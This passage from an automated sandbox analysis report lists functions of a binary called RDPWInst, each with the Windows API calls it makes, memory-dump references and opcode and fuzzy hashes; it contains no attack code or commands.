                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                • String ID:
                                                                                • API String ID: 3990497365-0
                                                                                • Opcode ID: b4db8f4b60a4758e302225d89cd2c63d37b5a2fd60e804dc2dc20906c96adb53
                                                                                • Instruction ID: 83055b0679be0c1ffa726a7bf1997f9f19e1454b2f4a6b728642dd338ff24854
                                                                                • Opcode Fuzzy Hash: b4db8f4b60a4758e302225d89cd2c63d37b5a2fd60e804dc2dc20906c96adb53
                                                                                • Instruction Fuzzy Hash: 80412070A003589FDB20EF59CC81BCAB7B9AB49304F0040FAE508E7251DB7A9E94CF59
                                                                                Function 00408B08 Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetThreadUILanguage.KERNEL32(?,00000000), ref: 00408B19
                                                                                • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 00408B7B
                                                                                • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 00408BD8
                                                                                • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 00408C0B
                                                                                  • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,00408B89), ref: 00408ADB
                                                                                  • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,00408B89), ref: 00408AF8
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Thread$LanguagesPreferred$Language
                                                                                • String ID:
                                                                                • API String ID: 2255706666-0
                                                                                • Opcode ID: 57ba5b2eaa9ba2f7f394178960eeeee68cc8fe68392739164dda0304afca2262
                                                                                • Instruction ID: ba3eb85df9a642da38a4383696d7f270617e705f6d5ccbab9dd9f20305666083
                                                                                • Opcode Fuzzy Hash: 57ba5b2eaa9ba2f7f394178960eeeee68cc8fe68392739164dda0304afca2262
                                                                                • Instruction Fuzzy Hash: 5A317C70A1021A9BDB00DFE9C885AAEB3B5FF44304F00457AE991E72D1DB78AE44CB58
                                                                                Function 0042FB48 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindResourceW.KERNEL32(00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000,?,0043CEE1), ref: 0042FB5F
                                                                                • LoadResource.KERNEL32(00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000), ref: 0042FB79
                                                                                • SizeofResource.KERNEL32(00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8), ref: 0042FB93
                                                                                • LockResource.KERNEL32(0042F774,00000000,00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000), ref: 0042FB9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: 6ebdd4f1cd543b76a016c77fc1286a410c61f79913e5f64509fe1404532659ad
                                                                                • Instruction ID: 2319d0df2cd87803d0a75df5626f4cddb48e3135002f19a9a4d545a6677a7621
                                                                                • Opcode Fuzzy Hash: 6ebdd4f1cd543b76a016c77fc1286a410c61f79913e5f64509fe1404532659ad
                                                                                • Instruction Fuzzy Hash: 49F06DB37012146F9745EEADA881D6B77FDEE88264390017FFA08D7202DA38ED154379
                                                                                Function 0040A0E6 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00449C1C), ref: 0040A0F8
                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 0040A10E
                                                                                • LeaveCriticalSection.KERNEL32(00449C1C,00449C1C), ref: 0040A143
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeavelstrcmpi
                                                                                • String ID: YD
                                                                                • API String ID: 2420758022-4277794568
                                                                                • Opcode ID: 0b44f2d380ec5fe545f4f2e3965f64519b1ec05f6d6c381fa1d4a9968702bb33
                                                                                • Instruction ID: abf7b61c1320a37f19f23f54b7b1c16b8e1f28cb69a34480c51c1f01e8ca554a
                                                                                • Opcode Fuzzy Hash: 0b44f2d380ec5fe545f4f2e3965f64519b1ec05f6d6c381fa1d4a9968702bb33
                                                                                • Instruction Fuzzy Hash: 8AF062322003145BEF106A619CC2B1677989F15714F100037FB007F2C3D6BC9C60466F
                                                                                Function 004059C6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405A9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID: $$@
                                                                                • API String ID: 3192549508-1194432280
                                                                                • Opcode ID: ffbabee0d71fd2b7d8fc05915f2ca3a30f23b11c7e3ffcedbc7f052df7b7c5c2
                                                                                • Instruction ID: fff674c7101e68f6d73d2d8a69124ddc370c84ad249f2bdacb9cff7d7fa155c1
                                                                                • Opcode Fuzzy Hash: ffbabee0d71fd2b7d8fc05915f2ca3a30f23b11c7e3ffcedbc7f052df7b7c5c2
                                                                                • Instruction Fuzzy Hash: 1C418C75304A019FD720DB14D884B2BB7A5EB89314F69867AF444AB392C738EC41CF69
                                                                                Function 0040589A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405906
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_0000589C), ref: 00405943
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID: $$@
                                                                                • API String ID: 3192549508-1194432280
                                                                                • Opcode ID: 23fdc1c80813b7a19c68f0c79cc3fa5e3fa91e7525bef4bca6a264e8681dbcfb
                                                                                • Instruction ID: 4b325d1a8302ad8f82e944498d23502563e7d009f61a8d4e6d3783212fd5e4e2
                                                                                • Opcode Fuzzy Hash: 23fdc1c80813b7a19c68f0c79cc3fa5e3fa91e7525bef4bca6a264e8681dbcfb
                                                                                • Instruction Fuzzy Hash: 533141B4604700EFD720DB10D888B6BBBA9EB84724F54857AF448A7291C738EC40CF69
                                                                                Function 00411498 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                                                • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DateFormatLocaleThread
                                                                                • String ID:
                                                                                • API String ID: 3303714858-3916222277
                                                                                • Opcode ID: 0d5b63d8b5d64c377b747a6270c18780734cafdd64312a6cbce0b29c00a6c7cf
                                                                                • Instruction ID: da40258a30b1bf54e866a7fbbaf5cc9082ba5d6ba5cf06b5a9e2a769468a01f6
                                                                                • Opcode Fuzzy Hash: 0d5b63d8b5d64c377b747a6270c18780734cafdd64312a6cbce0b29c00a6c7cf
                                                                                • Instruction Fuzzy Hash: 2C21BB31A04254AFC711DF64C8556EA77B5EF49300F4140A7FD45E72A1D6389E50C7AA
                                                                                Function 004150E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32 ref: 00415102
                                                                                • GetSystemMetrics.USER32(0000004A), ref: 00415153
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocaleMetricsSystemThread
                                                                                • String ID: p[D
                                                                                • API String ID: 3035471613-2202972244
                                                                                • Opcode ID: da98f0b9cf3a04fcb2a289a8677121395d8df8e9f207d3304538472cbe0e1366
                                                                                • Instruction ID: 0794bcb2409efff6a4af82a72d6dc306925be2e2831a755ee0de451743422fb7
                                                                                • Opcode Fuzzy Hash: da98f0b9cf3a04fcb2a289a8677121395d8df8e9f207d3304538472cbe0e1366
                                                                                • Instruction Fuzzy Hash: 4A010430A00650EADB129E6658813D27BD49B82315F48C0BBED489F387D63CD881C77A
                                                                                Function 0043A688 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443D31,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A693
                                                                                  • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 1646373207-3689287502
                                                                                • Opcode ID: 3a9063c87b9bf03a8dd6229c9438aece060355b6351e033b19066e162e83d57d
                                                                                • Instruction ID: 7cbe884eb00d1b8f8e0b90a93abb1152f64afda344a6e4615680911855581588
                                                                                • Opcode Fuzzy Hash: 3a9063c87b9bf03a8dd6229c9438aece060355b6351e033b19066e162e83d57d
                                                                                • Instruction Fuzzy Hash: D4E012513883C21AD61276FA1DD2B2E26CC4B6D709F2C287FB5C0D1193D99DC468863F
                                                                                Function 0043A724 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443E55,000001F4,000001F4,000003E8,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A72F
                                                                                  • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 1646373207-1355242751
                                                                                • Opcode ID: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
                                                                                • Instruction ID: 7f98099b70b18dc0c665e624c368f4c8ddeaec672eef30118536404a03429535
                                                                                • Opcode Fuzzy Hash: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
                                                                                • Instruction Fuzzy Hash: FBE0C2013883C21EE60272F90DD1B3A17D84B6C308F24183FB1C0D1183DB9CC524862F
                                                                                Function 00415B40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0044313B,00000000,0044315A), ref: 00415B46
                                                                                  • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                • API String ID: 1646373207-1127948838
                                                                                • Opcode ID: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
                                                                                • Instruction ID: 4ad585b0bbb22d8cb86f0bca7bf1fd5c676b9542b5302fef9f3b12a8682de55f
                                                                                • Opcode Fuzzy Hash: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
                                                                                • Instruction Fuzzy Hash: 92D0C7B4745F85DBFF10DBA55D83BD62254E785309B10043B70046D2D3D67C6894CB1D